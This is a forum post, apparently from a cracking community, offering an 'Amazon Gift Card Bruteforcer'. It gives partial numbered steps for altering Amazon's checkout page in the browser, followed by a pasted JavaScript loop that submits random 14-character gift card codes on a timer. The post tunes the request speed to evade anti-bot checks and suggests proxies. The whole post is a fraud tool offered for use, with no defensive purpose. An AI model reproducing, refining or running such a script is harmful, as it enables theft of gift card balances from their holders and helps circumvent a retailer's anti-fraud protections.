• We just launched and are currently in beta. Join us as we build and grow the community.

Amazon Gift Card Bruteforcer

lucky44

Achievement Unlocked
L Rep
0
0
0
Rep
0
L Vouches
0
0
0
Vouches
0
Posts
125
Likes
81
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 300 XP
Super easy way to bruteforce Amazon gift cards using javascript
Code:
data-testid=""
4. Change this line to:
Code:
id="epicbtn"
5. Hit enter and go to console
6. Paste in the following code:
Code:
alert("Peendoggos Amazon Bruteforcer Paste");
var speed = prompt("Enter speed val 1-1000 , 250 is recommended for antiantibotting.")
function makeid() {
var text = "";
var possible = "0Rm2PlfIKqEG4oUnavcJSBQY513d8xNWuTrCtFgwy6OXpkD79iVzZLbhMeHsAj"; //you can edit this to your own generation code
for (var i = 0; i < 14; i++)
text += possible.charAt(Math.floor(Math.random() * possible.length));
return text;
}
function main() {
document.getElementById("spc-gcpromoinput").value = makeid();
document.getElementById("epicbtn").click();
}
setInterval(function() {
main();
}, speed);
7. Refresh and repeat if amazon refreshes itself. Proxy may also help after a few attempts
EDIT: You can also use a string shuffler to spice up the string iteration.
Note: This isn't the most efficient of methods and has a low chance of success but whatebs
UPDATE: I HAVE NOT TESTED THIS SINCE I MADE IT AND HAVE NO PLANS ON UPDATING IT.
Edited by Nafi, 02 September 2021 - 08:00 PM.
 

438,740

315,860

315,869

Top